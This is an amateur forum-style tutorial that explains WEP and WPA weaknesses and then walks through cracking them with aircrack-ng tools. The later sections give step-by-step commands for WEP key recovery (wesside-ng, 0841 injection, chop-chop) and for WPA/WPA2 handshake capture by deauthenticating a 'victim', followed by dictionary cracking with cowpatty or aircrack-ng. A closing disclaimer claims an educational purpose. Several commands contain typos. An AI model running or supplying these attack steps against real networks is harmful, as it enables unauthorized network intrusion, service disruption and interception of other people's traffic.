Wireless Encrypted Networks

By Zero Cold
 Index

About WEP................................................................................................................. 3

About WPA…………………………………………………………………………. 4

Tools used to crack Wi-Fi…………………………………………………………... 5

Things to know before cracking WPA/WEP………………………………………... 6

Cracking WEP Wesside-ng…………………………………………………………. 7

Cracking WEP 0841………………………………………………………………… 10

Cracking WEP Chop Chop………………………………………………………….. 14

Cracking WPA with Airolib-ng & Cowpatty……………………………………….. 20

Cracking WPA with A Dictionary …………………………………………………..25

Things to remember when training………………………………………………….. 28
 WEP Encryption for Wireless Networks
Wired Equivalent Privacy (WEP) is a security protocol for wireless networks that encrypts transmitted data. It's
easy to configure. Without any security your data can be intercepted without difficulty.

However, WEP was an early attempt to secure wireless networks, and better security is now available such as
DES, VPN, and WPA.

WEP has three settings: Off (no security), 64-bit (weak security), 128-bit (a bit better security). WEP is not
difficult to crack, and using it reduces performance slightly.

If you run a network with only the default security, where WEP is turned off, any of your neighbors can
immediately log on to your network and use your Internet connection.

For wireless devices to communicate, all of them must use the same WEP setting. (40-bit and 64-bit WEP en-
cryption is the same thing — 40-bit devices can communicate with 64-bit devices.)

While there is no extra performance cost to encrypting the longer key, there is a cost to transmitting the extra
data over the network. 128-bit security is not much more difficult than 64-bit to crack, so if you are concerned
about performance, consider using 64-bit. If you're very concerned about security, use WPA, which replaces
WEP with a protocol that is — given current technology — impossible to crack. There's a good overview in
what’s New in Security: WPA (Wi-Fi Protected Access).

The WEP concept of passphrase is introduced so that you do not have to enter complicated strings for keys by
hand. The passphrase you enter is converted into complicated keys. Choose passphrases with the same care you
would important passwords.

With 128-bit encryption, you need to enter a passphrase to generate each key.

All four keys must be specified, because WEP switches between them to make your traffic more difficult to
break.

All devices within your LAN must use the same passphrases (i.e., the same keys).
 WPA Encryption or Wireless Networks
Wi-Fi Protected Access (WPA and WPA2) is a certification program administered by the Wi-Fi Alliance to
indicate compliance with the security protocol created by the Wi-Fi Alliance to secure wireless computer
networks. This protocol was created in response to several serious weaknesses researchers had found in the
previous system, Wired Equivalent Privacy (WEP). However, researchers discovered a flaw in 2008 that relied
on older weaknesses to retrieve the keystream from short packets to use for re-injection and spoofing. The
protocol implements the majority of the IEEE 802.11i standard, and was intended as an intermediate measure to
take the place of WEP while 802.11i was prepared. Specifically, the Temporal Key Integrity Protocol (TKIP)
was brought into WPA. TKIP could be implemented on pre-WPA wireless network interface cards that began
shipping as far back as 1999 through firmware upgrades. Because the changes required fewer modifications on
the client than on the wireless access point, most pre-2003 APs could not be upgraded to support WPA with
TKIP.

The later WPA2 certification mark indicates compliance with an advanced protocol that implements the full
standard. This advanced protocol will not work with some older network cards. Products that have successfully
completed testing by the Wi-Fi Alliance for compliance with the protocol can bear the WPA certification mark.

Pre-shared key mode (PSK, also known as Personal mode) is designed for home and small office networks that
don't require the complexity of an 802.1X authentication server. Each wireless network device encrypts the
network traffic using a 256 bit key. This key may be entered either as a string of 64 hexadecimal digits, or as a
passphrase of 8 to 63 printable ASCII characters. If ASCII characters are used, the 256 bit key is calculated
using the PBKDF2 hash function, using the passphrase as the key and the SSID as the salt.

Shared-key WPA is vulnerable to password cracking attacks if a weak passphrase is used. To protect against a
brute force attack, a truly random passphrase of 13 characters (selected from the set of 95 permitted characters)
is probably sufficient. Rainbow tables have been computed by the Church of WiFi for the top 1000 SSIDsfor a
million different WPA/WPA2 passphrases. To further protect against intrusion the network's SSID should not
match any entry in the top 1000 SSIDs.

In August 2008 a post in the Nvidia-CUDA forums announced the possibility to enhance the performance of
brute force attacks against WPA-PSK by a factor of 30 and more. The time-consuming PBKDF2-computation is
taken from the CPU to a GPU which can compute many passwords and their corresponding Pre-shared keys in
parallel. The expected time to successfully guess a common password by at least 50% shrinks to about 2-3 days
by that. Some consumer chip manufacturers have attempted to bypass weak passphrase choice by adding a
method of automatically generating and distributing strong keys through a software or hardware interface that
uses an external method of adding a new wireless adapter or appliance to a network. The Wi Fi Alliance has
standardized these methods and certifies compliance with these standards through a program called Wi-Fi
Protected Setup (formerly Simple Config).

A weakness was uncovered in November 2008 by researchers at two German technical universities (TU Dresden and TU
Darmstadt), Erik Tews and Martin Beck, which relied on a previously known flaw in WEP that could be exploited only
for the TKIP algorithm in WPA and WPA2. The flaw can only decrypt short packets with mostly known contents, such as
ARP messages, and 802.11e, which allows Quality of Service packet prioritization for voice calls and streaming media.
The flaw does not lead to key recovery, but only a keystream that encrypted a particular packet, and which can be reused
as many as seven times to inject arbitrary data of the same packet length to a wireless client. For example, this allows in-
jecting faked ARP packets which make the victim send packets to the open Internet.
 Tools for Cracking WEP/WPA Networks
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and
analysis tool for 802.11 wireless LANs. It works with any wireless card whose driver supports raw monitoring mode (for
a list, visit the website of the project) and can sniff 802.11a, 802.11b and 802.11g traffic. The program runs under Linux
and Windows; the Linux version has been ported to the Zaurus and Maemo platforms, and a proof-of-concept port has
been made to the iPhone.

In April 2007 a team at the Darmstadt University of Technology in Germany developed a new attack method based on a
paper released on the RC4 cypher by Adi Shamir. This new attack, named 'PTW', decreases the number of initialization
vectors or IVs needed to decrypt a WEP key and has been included in the aircrack-ng suite since the 0.9 release.

Aircrack-ng is a fork of the original Aircrack project.

Aircrack-ng Cracks WEP (Brute-force search) and WPA (Dictionary File) keys.

Airdecap-ng Decrypts WEP or WPA encrypted capture files with known key.

Airmon-ng Placing different cards in monitor mode.

Aireplay-ng Packet injector (Linux, and Windows [with Commview drivers]).

Airodump-ng Packet sniffer: Places air traffic into PCAP or IVS files and shows information about networks.

Airtun-ng Virtual tunnel interface creator.

Airolib-ng Stores and manages ESSID and password lists; Increases the KPS of WPA attacks

Packetforge-ng Create encrypted packets for injection.

Tools to merge and convert.

Airbase-ng Incorporates techniques for attacking client, as opposed to Access Points

Airdecloak-ng Removes WEP cloaking from pcap files

Airdriver-ng Tools for managing wireless drivers

Airolib-ng Stores and manages ESSID and password lists and compute Pairwise Master Keys

Airserv-ng Allows you to access the wireless card from other computers.

Buddy-ng The helper server for easside-ng, run on a remote computer

Easside-ng Tool for communicating to an access point, without the WEP key

Tkiptun-ng WPA/TKIP attack

Wesside-ng Automatic tool for recovering WEP key

Cowpatty Is designed to audit the pre-shared key (PSK)
 Things to know before cracking WEP/WPA Network
Basic service set identifier (BSSID)

A related field is the BSSID or Basic Service Set Identifier, which uniquely identifies each BSS (the SSID however, can
be used in multiple, possibly overlapping, BSSs). In an infrastructure BSS, the BSSID is the MAC address of the wireless
access point (WAP). In an IBSS, the BSSID is a locally administered MAC address generated from a 46-bit random num-
ber. The individual/group bit of the address is set to 0. The universal/local bit of the address is set to 1.

A BSSID with a value of all 1s is used to indicate the broadcast BSSID. A broadcast BSSID may only be used during
probe requests

Service Set identifier (SSID)

Service set identifier, or SSID, is a name that identifies a particular 802.11 wireless LAN. A client device receives broad-
cast messages from all access points within range advertising their SSIDs. The client device can then either manually or
automatically—based on configuration—select the network with which to associate. The SSID can be up to 32 characters
long. As the SSID displays to users, it normally consists of human-readable characters. However, the standard does not
require this. The SSID is defined as a sequence of 1–32 octets each of which may take any value.

It is legitimate for multiple access points to share the same SSID if they provide access to the same network as part of an
extended service set. Some wireless access points support broadcasting multiple SSIDs, allowing the creation of Virtual
Access Points, partitioning a single physical access point into several virtual access points, each of which can have a dif-
ferent set of security and network settings. This is not yet part of the 802.11 standard.

MAC address (Mac)

In computer networking, a Media Access Control address (MAC address) is a unique identifier assigned to most network
adapters or network interface cards (NICs) by the manufacturer for identification, and used in the Media Access Control
protocol sub layer. If assigned by the manufacturer, a MAC address usually encodes the manufacturer's registered identi-
fication number. It may also be known as an Ethernet Hardware Address (EHA), hardware address, adapter address, or
physical address.

There are three numbering spaces, managed by the Institute of Electrical and Electronics Engineers (IEEE), which are in
common use for formulating a MAC address: MAC-48, EUI-48, and EUI-64. The IEEE claims trademarks on the names
"EUI-48" and "EUI-64", where "EUI" stands for Extended Unique Identifier.

Although intended to be a permanent and globally unique identification, it is possible to change the MAC address on most
of today's hardware, an action often referred to as MAC spoofing. Unlike IP address spoofing, where a sender spoofing
their address in a request tricks the other party into sending the response elsewhere, in MAC address spoofing (which
takes place only within a local area network), the response is received by the spoofing party.

A host cannot determine from the MAC address of another host whether that host is on the same OSI Layer 2 network
segment as the sending host, or on a network segment bridged to that network segment. In TCP/IP networks, the MAC
address of a subnet interface can be queried with the IP address using the Address Resolution Protocol (ARP) for Internet
Protocol Version 4 (IPv4) or the Neighbor Discovery Protocol (NDP) for IPv6. On broadcast networks, such as Ethernet,
the MAC address uniquely identifies each node and allows frames to be marked for specific hosts. It thus forms the basis
of most of the Link layer (OSI Layer 2) networking upon which upper layer protocols rely to produce complex, function-
ing networks.
 Crack WEP with Wesside-ng Attack
Before cracking WEP with wesside-ng you will need are wireless interface name you can find this by opening a shell and
typing the following command:

airmon-ng.  Your Device Name May Be Different

You should see a list of interfaces like below

Now you have your wireless interface name you will have to put the card into monitor mode by typing the following
commands:

airmong-ng start wlan0.  Your Device Name May Be Different

Note: the image above may look different if it says (monitor mode enabled on mon0) use mon0 as your device name. Now
you have your card in monitor mode we can start airodump to get the BSSID so you need to type airodump-ng & your
device name for example airodump-ng mon0 & it will look like below

airodump-ng mon0  Your Device Name May Be Different

Note: the encryption above is WPA but I changed it to WEP For Making this tutorial I changed the encryption type before
taking the image if you would like to crack WPA/WPA2 please go further down the page for that. Now you have the
BSSID from airodump you can start with wessid-ng next step is enter the commands in wesside-ng open a new shell or
press ctrl-c to kill airodump-ng & enter the next few commands:

wesside-ng –h
Please Take note of these options they are always handy to crack a network fast & easy because this is a one line com-
mand tool the other ways of cracking networks the I will show you will be more than one line this is the most simple &
automated tool for cracking network that I know of at this time. The next step is to choose your options mine may be
different I have chosen to attack a network using a 64bit encryption for this tutorial so here we go.

Wesside-ng –i mon0 –v 00:23:4E: BC: 3A: AB –k3  Your Device Name May Be Different

The reason I’m am using –k3 is because I get a packet collect error it something to do whit my wireless card if you get a
error try using –k3 or –k1 this is used for distance errors

Notice it capturing a type of encrypted key known as a IV once it captures enough IV’s it can crack the keys also see it
capturing from a computer on the network the Mac address (00:1F:9F:AA:B0:4C) that the Mac address from the victims
machine who is using the internet. Once it has collected enough IV’s it will automatically crack the key like below
 Cracking WEP 0841 Attack
Before cracking WEP with the 0841 method you will need are wireless interface name you can find this by opening a
shell and typing

airmon-ng

Now you have your wireless interface name you will have to put the card into monitor mode by typing the following
commands:

airmong-ng start wlan0  Your Device Name May Be Different

Now you have the device in monitor mode you need to scan with airodump-ng so you need to use the commands:

airodump-ng mon0  Your Device Name May Be Different

Like above you have airodump running you need to note down the bssid & the channel number for this attack. Once you
have that press ctrl-c to kill the connection & restart airodump-ng with the following commands

airodump-ng –w wep –c 1 –bssid 00:23:4E:BC:3A:AB mon0  Your Device Name May Be Different

--bssid Victims Broadcast Address

-c The channel number of the router

-w The name of output file

Please keep airodump-ng running with the setting you have chosen for it to collect packets in the wep-01.cap file for
cracking later after we have entered a few more commands.

Now we have are card collecting packets & in monitor mode we can start by making a fake authentication with the victim
access point. You can do this by typing

aireplay-ng -1 3 –a 00:23:4E: BC: 3A: AB –h 00:1F:1F:14:4D: 6B mon0  Your Device Name May Be Different

-1 Fake Authentication

3 Amount of Time to Authenticate

-a Victims Broadcast Address

-h Your Mac Address

To find your Mac address I found the best way is to do the following commands

Macchanger –mac 00:11:22:33:44:55:66 wlan0  Your Device Name May Be Different

As you can see below it has authenticated enough get a IV packet but it needs more so I have set it to 3 to get more pack-
ets if it’s running a 128 bit encryption it may need more so now you need to make sure it going to collect all this info into
a cap file we can do this by doing the next step

aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b 00:23:4E:BC:3A:AB –h 00:1F:1F:14:4D:6B mon0

-b Victims Broadcast Address

-2 Interactive Frame Selections

-p Set Frame Control word (Hex)

-c Set Destination Mac Address

-h Your Mac Address
As you can see its capturing packets in the cap file that you created with airodump now you are capturing the packets you
can start aircrack-ng by opening a new shell & typing the following command:

aircrack-ng wep*.cap

Wep*.cap The file we are collecting IV packets in to

The reason I have put a * there is due to if you have run airodump more than once it will make more cap files when using
the –w command for file output & the files will output like this wep-01.cap,wep-02.cap & so on using the * in your com-
mand line it will use every pcap file you have in your root directory.

When Cracking with aircrack it tries to crack the key in multiple packet intervals for example you will need to
capture at least 5000 ivs before aircrack-ng may crack the key then it will go to 10000 ivs & so on so if it does
not crack the key strait away don’t worry because it could take a little time due to the length or encryption of the
key
 Cracking WEP Chop Chop Attack

Before cracking WEP with the Chop Chop Attack method you will need are wireless interface name you can find this by
opening a shell and typing

airmon-ng
.

Now you have your wireless interface name you will have to put the card into monitor mode by typing the following
commands:

airmong-ng start wlan0  Your Device Name May Be Different

You now need to run airodump-ng to get the bssid & the channel number of the victim’s router you can do this by typing

airodump-ng -w wep –c 1 –bssid 00:23:4E:BC:3A:AB mon0  Your Device Name May Be Different

-w Name of Output File

-c Channel Number

Now you need to make a fake authentication with the victims router you can do this by typing the following commands:

aireplay-ng -1 0 –a 00:23:4E: BC: 3A: AB –h 00:1F:1F:14:4D: 6B mon0  Your Device Name May Be Different

Please Note that your bssid & Mac address will be different to mine & maybe your device name

-1 Fake authentication

0 Amount OF time TO authenticate 0 is also used as continuous loop

-a Victims broadcast address

-h Your Mac address
Now you have successfully authenticated you will need to collect a XOR packet using aireplay you can do this by typing
the following commands

aireplay-ng -4 –b 00:23:4E:BC:3A:AB –h 00:1F:1F:14:4D:6B mon0  Your Device Name May Be Different

-4 Chop Chop WEP Packet

-b Victims Broadcast Address

-h Your Mac Address
Once this has captured enough packets it will dump the output into a xor packet when it starts doing as the image is
showing below

Now we have are xor packets saving into an output file we can start on the next step you will need to create an arp-request
by using the following commands

Packetforge-ng -0 –a 00:23:4E: BC: 3A: AB –h 00:1F:1F:14:4D: 6B –k 225.225.225.225 –l 255.255.255.255.255 –y

replay-dec-1126-112243.xor –w arp-request

-0 Forge an ARP Packet

-a Victims Broadcast Address

-h You Mac Address

-k Set Destination Ip Address

-l Set Source Ip Address

-y Read PRGA from This File (File Created With Aireplay-ng -5)

-w Write Packet to Pcap File
The next step is to inject packets with the arp-request packet that you created with packetforge-ng to do this you can use
aireplay with the following commands:

aireplay-ng -2 –r arp-request mon0  Your Device Name May Be Different

Info:

-2 Interactive Frame Selection (injection)

-r Extract Packets From This File (Your File Created With Packetforge-ng)
All is left to do now is open a new shell type in

aircrack-ng -P 2 wep*.cap

-P 2 PTW Attack

Wep*.cap The file we are collecting IV packets in to

The reason I have put a * there is due to if you have run airodump more than once it will make more cap files when using
the –w command for file output & the files will output like this wep-01.cap,wep-02.cap & so on using the * in your com-
mand line it will use every pcap file you have in your root directory.

As you can see the above aircrack-ng has cracked the wireless key & decrypted it fully now all you need to do is take out
the colons & enter your key that you have crack & connect to the victims router

When Cracking with aircrack it tries to crack the key in multiple packet intervals for example you will need to
capture at least 5000 ivs before aircrack-ng may crack the key then it will go to 10000 ivs & so on so if it does
not crack the key strait away don’t worry because it could take a little time due to the length or encryption of the
key
 Cracking WPA with Airolib & Cowpatty

In this tutorial it will show you how to crack WPA & wpa2 networks with airolib & cowpatty.
Cowpatty is used to brute force a set pcap file that outputs from aircrack-ng
Before we use cowpatty you need to prepared by collecting a four way handshake the problem with cracking WPA & get-
ting a four way handshake is you have to have a victim
To deauthenticate to collect a packet to start using cowpatty this can be done multiple ways

Before you start you will have to do what you have done in the following tutorials if you have followed then you need to
put your card into monitor mode this can be done
By typing

airmon-ng start wlan0  Your Device Name May Be Different

Now your card is in monitor mode you will need to use airodump-ng to find the victim’s bssid, Essid & channel number.
Once you have then press control-C & use the following commands:

airodump-ng -w WPA -c 1 --bssid 00:23:4E: BC: 3A: AB mon0  Your Device Name May Be Different

-w The name of output file

-c The channel number

--bssid The victims Broadcast Address

Next you will need to deauthenticate a victim on the network in other words boot he or she off the network for it to cap-
ture a four way handshake on reconnection. This can be done with the following commands

aireplay-ng -0 1 -a 00:23:4E: BC: 3A: AB -c 00:23:4D: 11:87:d5 mon0  Your Device Name May Be Different

Info:

-0 Deauthenticate victim

1 The amount of times to deauthenticate

-a The victims broadcast address

-c The victims mac address of machine

As you can see in the above image I have successfully deauthenticated the victims machine on the network to capture a
four way handshake to know if you have the four way handshake you can see on the top right of the airodump window
Once you have your four way handshake you need to create a database for cowpatty to read you can do this using airolib-
ng with the following commands

airolib-ng pskdb –import passwd /root/password.txt

Pskdb The name of database to be created

Passwd Imports the password list

/root/password.txt The location of password list

Here is the output I got when I imported the passwords

Now you have the database created you will need to import essid’s you will need to create a text file I have chosen to call
mine essid.txt but yours can be different remember if you rename you text file the name will be different in the command
line also you may want to place it into your root directory to save time for command line to import your essid.txt file place
the following commands into your shell:

airolib-ng pskdb --import essid essid.txt

You output should look like below

root@root~# airolib-ng pskdb –import essid essid.txt

Reading file...
Writing...
Done.
root@root~#

The next step is to batch the file ready for output for usage in cowpatty you can do this with the following command:

Airolib-ng pskdb –batch

This may take a little bit of time depending on the size of your wordlist for this guide I am using a small wordlist that con-
sists of approximately 1805 password but you will want a much larger one I have posted a 64million word one on the fo-
rums if you would like to download it go here http://www.megaupload.com/?d=7RN6ZB2E

Once you have everything batched up and ready to go let’s just check everything went to plan with airolib-ng you can do
this with the following command

Airolib-ng pskdb --stat

Here is my output
Now we have all the required information in are database we can output it into a file that cowpatty can read this can be
done with the following command:

Airolib-ng pskdb –export cowpatty BTHomeHub2-S5JW out

Please remember to change the essid to your essid that you have in your list & in your database and if all has gone to plan
it should look like below

root@root~# airolib-ng pskdb –export cowpatty BTHomeHub2-S5JW out

Exporting...
Done.
root@root~#

And now you should have a file called Output in your home folder so let’s recap to see to check that everything
has been done correctly

We started by putting are card into monitor mode then run airodump-ng to collect are bssid,essid & channel
number then we closed airodump-ng & re-run it with are settings & creating a pcap file with airodump locked
on a set channel number & bssid then we deauthenticated a victim on the network to collect are four way hand-
shake which was stored in the pcap file then we created a cowpatty file using airolib-ng ready for cracking with
cowpatty & now is the time to do this with the following commands:

cowpatty -s BTHomeHub2-S5JW -d out -r WPA-01.cap

-s Victims Essid

-d The output file that you created with airolib-ng

-r The pcap file that you created with airodump-ng

Please not if you are getting errors like file not found put in the locations of the files for example: /root/Output
 Cracking WPA with A Dictionary

In this tutorial it will show you how to crack WPA & wpa2 networks with aircrack & a dictionary list.
This is a little bit different from using airolib-ng & cowpatty its slower but you do not have to type is as many commands
and wait for the file to batch up it almost a strait forward brute force attack but like before you will need to get a four way
handshake. The problem with cracking WPA & getting a four way handshake is you have to have a victim
To deauthenticate to collect a packet to start using cowpatty this can be done multiple ways

Before you start you will have to do what you have done in the following tutorials if you have followed then you need to
put your card into monitor mode this can be done
By typing

airmon-ng start wlan0  Your Device Name May Be Different

Now your card is in monitor mode you will need to use airodump-ng to find the victim’s bssid, Essid & channel number.
Once you have then press control-C & use the following commands:

airodump-ng -w WPA -c 1 --bssid 00:23:4E: BC: 3A: AB mon0  Your Device Name May Be Different

-w The name of output file

-c The channel number

--bssid The victims Broadcast Address

Next you will need to deauthenticate a victim on the network in other words boot he or she off the network for it to cap-
ture a four way handshake on reconnection. This can be done with the following commands

aireplay-ng -0 1 -a 00:23:4E: BC: 3A: AB -c 00:23:4D: 11:87:d5 mon0  Your Device Name May Be Different

Info:

-0 Deauthenticate victim

1 The amount of times to deauthenticate

-a The victims broadcast address

-c The victims mac address of machine

As you can see in the above image I have successfully deauthenticated the victims machine on the network to capture a
four way handshake to know if you have the four way handshake you can see on the top right of the airodump window
Now you have a four way handshake you can start cracking with aircrack-ng & you dictionary list if you need a dictionary
list there is one posted on the forums here is the link http://www.megaupload.com/?d=7RN6ZB2E

to use aircrack-ng & a dictionary is simple when you remeber the commands here is how to do it

aircrack-ng -w password.txt WPA-01.cap

-w Your dictionary file

WPA-01.cap your capture file (The File Created With Airodump)

Here is my output
 Things to remeber when training
I will not take any resposibility on what you do if you use the tutorials for molicuse use & you get busted its not my fualt i
have written this guide for education perposes & performed all attacks on my own local network & agianst my own router
remeber there are laws on cracking into networks & peoples private information

Also if you have any problems with these guides please contact me on the forums & i will try to help you sort them out i
have been cracking wireless keys for about 2 years now & trying to find news ways to attack them also these are only a
few ways of doing it

this is more of a introduction to cracking wireless internet & i will be brining some more guides out soon to show the sort
of damage or what a attacker can do once he has a foothold in your network or even a backdoor one of your computers on
the networks how he can attack every computer on the network from a remote location

thanks for reading hope you enjoyed & learned somthing out of this i enjoyed writing it & reperforming old ways that i
havent done in a while

Shouts to pentest & qubit for being such good member’s & staff on the forums

Peace Zero Cold